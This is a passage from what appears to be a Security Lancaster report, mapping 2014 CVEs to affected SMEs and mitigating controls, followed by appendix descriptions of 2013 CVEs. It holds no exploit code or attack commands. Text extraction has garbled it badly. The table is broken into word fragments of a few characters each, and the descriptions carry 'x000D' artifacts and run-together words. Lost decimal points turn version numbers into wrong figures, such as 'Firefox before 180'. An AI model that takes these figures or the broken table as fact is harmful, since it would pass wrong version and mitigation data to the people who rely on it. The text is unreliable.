(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
